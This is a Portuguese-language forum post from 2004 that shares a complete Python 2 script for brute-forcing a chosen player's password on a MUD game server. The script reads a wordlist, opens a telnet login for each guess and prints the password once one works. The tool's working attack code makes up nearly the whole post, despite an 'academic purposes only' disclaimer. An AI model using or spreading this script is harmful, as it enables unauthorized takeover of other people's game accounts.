Brute Force para MUD
Publicado por Karl Phillip 14/07/2004
[ Hits: 10.977 ]
Programa do tipo forca bruta para MUDs, escrito em Python por mim.
Tenta descobrir a senha de um jogador atraves de um dicionario de palavras, passando como parametro o Host e a Porta em que o jogo esta rodando.
Uso: ./mudbf.py end.do-mud.com 3000 JOGADOR dic_palavras.txt
Meus agradecimentos a <Aloysio de Paiva Figueiredo> pelo incentivo e muitas vezes suporte.
#!/usr/bin/python ######################################################################################### ### # ### This is a <Brute Force> program for MUD. # ### It was design fo academic purposes only. ***USE IT AT OWN RISC*** # ### Written in Python by: Karl Phillip # ### website: www.maxphil.cjb.net # ### em@il: max-phil@bol.com.br # ### Karl Phillip # ######################################################################################### import sys, string from telnetlib import Telnet try: host_name = sys.argv[1] port = sys.argv[2] ptarget = sys.argv[3] fname = sys.argv[4] except IndexError: print ">> Usage: ./mudbf <host> <port> <playerTARGET> <passwdFILE)\n" sys.exit(1) try: arq = open(fname) arq.close() except IOError: print ">> Password file does not exist!\n" sys.exit(1) print "\n<PytHoN programmed/> _brute_force4MUD_" print "" print " http://www.maxphil.cjb.net" print " by: Karl Phillip \n" print " <Target>: %s" % host_name print " <Port>: %s" % port print " <Player>: %s\n" % ptarget print ">> Trying passwords.. (this could take a few minutes)\n" arq = open(fname) login_sucess = "*** PRESS RETURN:" login_new ="Did I get that righ" numtries = 0 looping = False while not looping: for line in arq.readlines(): passwd = line numtries += 1 vict = Telnet(host_name, port) vict.write(ptarget+"\n") vict.write(str(passwd)+"\n") response = vict.read_until("Wrong password.", 12) if string.count(response, login_new): print "\n=========================================" print " *PLAYER NOT FOUND* in this MUD!" print "=========================================\n" arq.close() vict.close() sys.exit(1) elif string.count(response, login_sucess): print "\n <Passwords tried> %d" % int(numtries) print "\n*User*: %s" % ptarget print "*Password*: %s" % passwd vict.close() sys.exit(1) else: #print "Trying passwd: %s" % passwd vict.close() vict.close() looping = True arq.close() vict.close() print "\n <Passwords tried> %d" % int(numtries) print "\n=========================================" print " *NO PASSWORD* was found in that file!" print "=========================================\n"
Mkpass - Função para gerar senhas aleatórias
Cracker De Senha (cupp.py) 1.0
DSearch - (Dir Search): script python para descobrir diretórios de servidores.
Automação de scan de vulnerabilidades de URL
Comparação entre os escalonadores BFQ e MQ-Deadline (acesso a disco) no Arch e Debian
Conciliando o uso da ZRAM e SWAP em disco na sua máquina
Servidor de Backup com Ubuntu Server 24.04 LTS, RAID e Duplicati (Dell PowerEdge T420)
Visualizar câmeras IP ONVIF no Linux sem necessidade de instalar aplicativos
Overclocking Permanente para Drastic no Miyoo Mini Plus
Problemas de chaves (/usr/share/keyrings) no Debian
Converter os repositórios Debian para o novo formato com as chaves
E aí? O Warsaw já está funcionando no Debian 13? (9)
Problema com o Centro de Aplicativos Ubuntu 25.04 (2)
linux mint reconhece microfone de lapela como fone de ouvido sem micro... (6)